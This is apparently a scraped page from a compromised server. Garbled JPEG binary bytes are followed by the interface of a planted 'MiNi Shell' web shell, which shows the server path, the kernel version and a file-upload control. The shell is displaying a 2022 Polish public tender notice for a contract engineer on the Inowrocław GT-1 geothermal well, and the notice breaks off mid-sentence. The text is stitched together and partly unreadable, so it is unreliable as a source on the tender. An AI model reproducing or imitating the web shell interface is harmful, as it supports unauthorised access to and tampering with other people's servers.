JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220809/0029754101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprawowanie funkcji inżyniera kontraktu podczas wykonania otworu poszukiwawczo-rozpoznawczego wód termalnych Inowrocław GT-1 <br/>w miejscowości Inowrocław </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Inowrocław</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 092350725</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Ratuszowa 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Inowrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL617 - Inowrocławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@inowroclaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.inowroclaw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprawowanie funkcji inżyniera kontraktu podczas wykonania otworu poszukiwawczo-rozpoznawczego wód termalnych Inowrocław GT-1 <br/>w miejscowości Inowrocław </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4435655e-17b6-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00297541</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00021736/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Pełnienie funkcji inżyniera kontraktu podczas prac związanych z wykonaniem otworu poszukiwawczo-rozpoznawczego wód termalnych Inowrocław GT-1</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://inowroclaw.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://inowroclaw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformie zakupowej tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b)	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d)	włączona obsługa JavaScript;<br/>e)	zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZZP.271.1.34.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonanie usługi polegającej na pełnieniu funkcji inżyniera kontraktu podczas wykonywania prac i robót określonych w ,,Projekcie robot geologicznych na wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Inowrocław GT-1 <br/>w miejscowości Inowrocław” oraz „Dodatku nr 1 do projektu robót geologicznych na wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Inowrocław GT-1 <br/>w miejscowości Inowrocław”, dalej zwanymi projektem robót geologicznych, wraz z wykonaniem badań laboratoryjnych i opracowaniem właściwej dokumentacji w ramach przedsięwzięcia realizowanego pod nazwą: <br/>,,Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Inowrocław GT-1 w miejscowości Inowrocław&#34; dofinansowanego ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej w ramach programu priorytetowego nr 2.10 „Udostępnianie wód termalnych w Polsce&#34;. <br/>2.	W zakres zamówienia wchodzi:<br/>1) Doradztwo przy udzielaniu zamówienia publicznego na wybór wykonawcy wykonania otworu poszukiwawczo-rozpoznawczego wód termalnych Inowrocław GT-1 w miejscowości Inowrocław, obejmujące opracowanie części technicznej opisu przedmiotu zamówienia, w szczególności:<br/>	określenie minimalnych wymagań technicznych,<br/>	określenie warunków udziału w postępowaniu,<br/>	aktualizacja kosztorysu inwestorskiego,<br/>	opracowanie przedmiaru robót, <br/>	opracowanie harmonogramu robót,<br/>	weryfikacja treści projektu robót geologicznych,<br/>	wyjaśnienia treści SWZ na wnioski wykonawców dotyczące części technicznej zamówienia;<br/>	udział w ocenie ofert poprzedzającej wybór wykonawcy. <br/>2) Sprawowanie nadzoru podczas wszelkich prac i robót określonych w projekcie robót geologicznych. <br/>3) Sprawowanie dozoru geologicznego podczas wykonywania wszelkich prac i robót określonych w projekcie robót geologicznych oraz wynikających z modyfikacji wprowadzonych przez nadzór geologiczny, wraz z przekazywaniem nadzorowi geologicznemu wszelkich bieżących informacji o aktualnej sytuacji w otworze, opracowanie raportów dobowych dokumentujących wykonanie otworu geotermalnego. <br/>4)	Opracowanie dokumentacji otworowej z wykonania odwiertu geotermalnego. <br/>5)	Stałe uczestnictwo w naradach technicznych organizowanych przez wszystkie strony procesu inwestycyjnego.<br/>6)	Bieżące informowanie Zamawiającego o postępie robót na budowie, ewentualnych trudnościach w jego realizacji i możliwych do wystąpienia zagrożeniach. <br/>7)	Bieżąca współpraca z Zamawiającym i wykonawcą wierceń w trackie realizacji prac wiertniczych oraz wsparcie merytoryczne przy rozstrzyganiu trudności natury technicznej i organizacyjnej.<br/>8)	Sprawowanie nadzoru wiertniczego nad wykonawcą otworu geotermalnego <br/>w trakcie realizacji prac wiertniczych w tym między innymi:<br/>	doradztwo w sprawach dotyczących konstrukcji odwiertu,<br/>	nadzorowanie, doradztwo i udział w podejmowaniu decyzji odnośnie prowadzenia wszelkich prac wiertniczych w odwiercie, w tym zwłaszcza wydawanie poleceń odnoszących się do metody, technologii i efektywności prowadzonych prac zgodnie <br/>z obowiązującymi przepisami i przyjętymi w branży standardami postępowania,<br/>	przygotowanie prognoz odnośnie potrzeb w zakresie sprzętu i personelu oraz pomoc przy zamawianiu niezbędnych usług,<br/>	kontrolowanie postępu poszczególnych faz prac na odwiercie oraz zgodności <br/>z założonym harmonogramem prac,<br/>	opiniowanie i doradztwo w zakresie rozwiązywana problemów technicznych wynikłych w trakcie wykonywanych prac,<br/>	nadzorowanie wykonywania prac serwisów zaangażowanych przy robotach wiertniczych,<br/>	nadzorowanie bezpieczeństwa stosowania substancji i preparatów chemicznych na ternie objętym robotami,<br/>	współpraca z innymi organami nadzoru, właściwymi miejscowo z Zamawiającym. <br/>9)	Badania laboratoryjne – wykonanie laboratoryjnych badań prób w zakresie miedzy innymi:<br/>	składu petrograficznego i właściwości fizyko-chemicznych skał,<br/>	właściwości fizyko-chemicznych i przydatności do wykorzystania w balneoterapii wód termalnych,<br/>	ustalenia składu gazu złożowego.<br/>10)	Opracowanie i zatwierdzenie dokumentacji hydrogeologicznej w zakresie:<br/>	opracowanie dokumentacji hydrogeologicznej ustalającej zasoby eksploatacyjne wód termalnych wraz z uczestnictwem w procedurze zatwierdzania tej dokumentacji hydrogeologicznej, aż do uzyskania decyzji właściwego organu administracji geologicznej zatwierdzającej dokumentację,<br/>	przekazanie Zamawiającemu zatwierdzonej dokumentacji hydrogeologicznej <br/>w wymaganej ilości i formie po zakończeniu przedsięwzięcia.<br/>11)	Współpraca z Zamawiającym w przygotowaniu rozliczenia inwestycji <br/>w NFOŚiGW poprzez przygotowywanie wniosków o wypłatę środków zgodnie <br/>z Umową o dofinansowanie oraz przygotowywanie sprawozdań i dokumentów rozliczeniowych potwierdzających prawidłowość realizacji robót wiertniczych według harmonogramu uzgodnionego z NFOŚiGW i osiągnięcia efektu rzeczowego zgodnego z Umową o dofinansowaniu Projektu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">76431500-8 - Usługi nadzorowania wierceń</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-02-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1)	sytuacji ekonomicznej i finansowej - wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 1 000 000,00 zł (słownie: jeden milion złotych);<br/>2)	zdolności technicznej lub zawodowej, tj.: <br/>a)	w okresie ostatnich 5-ciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, należycie wykonali co najmniej 2 usługi, z których każda obejmowała swym zakresem pełnienie funkcji inżyniera kontraktu, którego częścią było pełnienie nadzoru i dozoru geologicznego oraz rozliczenie finansowe kontraktu, przy czym łączna wartość tych usług była nie mniejsza niż 1.000.000,00 zł brutto;<br/>b)	dysponują:<br/>- 1 osobą, która będzie pełniła funkcję kierownika projektu, posiadającą kwalifikacje w zawodzie geolog, w zakresie czynności polegających na wykonywaniu, dozorowaniu i kierowaniu pracami geologicznym, kategorii IV, potwierdzonymi świadectwem wydanym przez ministra właściwego do spraw środowiska na podstawie art. 51 pkt 1 ustawy z dnia 9 czerwca 2011 r Prawo geologiczne i górnicze (Dz.U.2022, poz.1072 – dalej Prawo geologiczne i górnicze), oraz posiadającą doświadczenie, zdobyte w ciągu ostatnich 10 lat od upływu terminu składania ofert, podczas kierowania/koordynowania wierceniem minimum 2 otworów geotermalnych o głębokości minimum 1 200 m p.p.t. wraz ze sporządzaniem zatwierdzonych dla tych otworów dokumentacji hydrogeologicznych ustalających zasoby eksploatacyjne wód termalnych;<br/>- 1 osobą, która będzie pełniła funkcję nadzoru hydrogeologicznego, posiadającą kwalifikacje w zawodzie geolog, w zakresie czynności polegających na wykonywaniu, dozorowaniu i kierowaniu pracami geologicznym kategorii IV, potwierdzonymi świadectwem wydanym przez ministra właściwego do spraw środowiska na podstawie art. 51 pkt 1 Prawa geologicznego i górniczego, oraz posiadającą doświadczenie, zdobyte w ciągu ostatnich 10 lat od upływu terminu składania ofert, podczas kierowania/koordynowania wierceniem minimum 2 otworów geotermalnych o głębokości minimum 1 200 m p.p.t. wraz ze sporządzaniem zatwierdzonych dla tych otworów dokumentacji hydrogeologicznych ustalających zasoby eksploatacyjne wód termalnych;<br/>- 1 osobą, która będzie pełniła funkcję nadzoru geologicznego, posiadającą kwalifikacje w zawodzie geolog, w zakresie czynności polegających na wykonywaniu, dozorowaniu i kierowaniu pracami geologicznym, kategorii IV, potwierdzonymi świadectwem wydanym przez ministra właściwego do spraw środowiska na podstawie art. 51 pkt 1 Prawa geologicznego i górniczego, oraz posiadającą doświadczenie, zdobyte w ciągu ostatnich 10 lat od upływu terminu składania ofert, podczas kierowania/koordynowania wierceniem minimum 2 otworów geotermalnych o głębokości minimum 1 200 m p.p.t. wraz ze sporządzaniem zatwierdzonych dla tych otworów dokumentacji hydrogeologicznych ustalających zasoby eksploatacyjne wód termalnych;<br/>- 1 osobą, która będzie pełniła funkcję kierownika dozoru geologicznego, posiadającą kwalifikacje w zawodzie geolog, w zakresie czynności polegających na wykonywaniu, dozorowaniu i kierowaniu pracami geologiczny, kategorii IV lub XIII, potwierdzonymi świadectwem wydanym przez ministra właściwego do spraw środowisk (kat. IV) lub właściwego marszałka województwa (kat. XIII) na podstawie art. 51 pkt 1 lub pkt 13 Prawa geologicznego i górniczego, oraz posiada doświadczenie, zdobyte w ciągu ostatnich 10 lat od upływu terminu składania ofert, podczas dozorowania minimum 4 otworów geotermalnych o głębokości minimum 1 200 m p.p.t.;<br/>- czterema osobami, które będą członkami zespołu dozoru geologicznego, posiadającymi kwalifikacje w zawodzie geolog, w zakresie czynności polegających na wykonaniu, dozorowaniu i kierowaniu pracami geologicznymi, kategorii IV lub XIII, potwierdzonymi świadectwem wydanym przez ministra właściwego do spraw środowiska (kat. IV) lub właściwego marszałka województwa (kat. XIII) na podstawie art. 51 pkt 1 lub pkt 13 Prawa geologicznego i górniczego oraz posiada doświadczenie, zdobyte w ciągu ostatnich 10 lat od upływu terminu składania ofert, w sprawowaniu dozoru geologicznego podczas wiercenia minimum 3 otworów geotermalnych o głębokości minimum 1 200 m p.p.t. <br/>Uwaga: Nie dopuszcza się łączenia wyżej wymienionych funkcji w zakresie uprawnień i doświadczenia tj. nie dopuszcza się, aby jedna osoba sprawowała więcej niż jedną funkcję w trakcie realizacji zadania stanowiącego przedmiot zamówienia w niniejszym postępowaniu. <br/>Jako otwór geotermalny należy rozumieć otwór, z którego eksploatowana woda ma ustabilizowaną temperaturę na wypływie nie mniejszą niż 20oC. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzony nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>2)	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy;<br/>3)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie wymaga sie <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 12 000,00 zł (słownie: dwanaście tysięcy zł). Szczegółowe informacje w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> określone w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje zmiany umowy na podstawie art. 455 ust. 1 pkt 1 w następujących przypadkach i zakresie: <br/>1)	wystąpiła konieczność wykonania usług dodatkowych, nieprzewidzianych w SWZ, lub rezygnacji z części zamawianych usług, na wniosek Zamawiającego lub wykonawcy, z możliwością zmiany wynagrodzenia ustalonego przez Strony w drodze negocjacji;<br/>2)	wykonawca złożył pisemny uzasadniony wniosek, że termin wykonania umowy nie może zostać zachowany z przyczyn, za które nie odpowiada, w szczególności:<br/>a) wystąpiło przekroczenie określonych przez prawo terminów wydawania przez organy administracji lub inne właściwe podmioty decyzji, zezwoleń, uzgodnień itp.,<br/>b)	wstrzymania wierceń przez uprawnione organy z przyczyn niezależnych od wykonawcy, w tym jeżeli podczas wierceń ujawnią się znaleziska archeologiczne lub wojenne,<br/>c)	wystąpienia warunków terenu wierceń odbiegających w sposób istotny od przyjętych w dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub 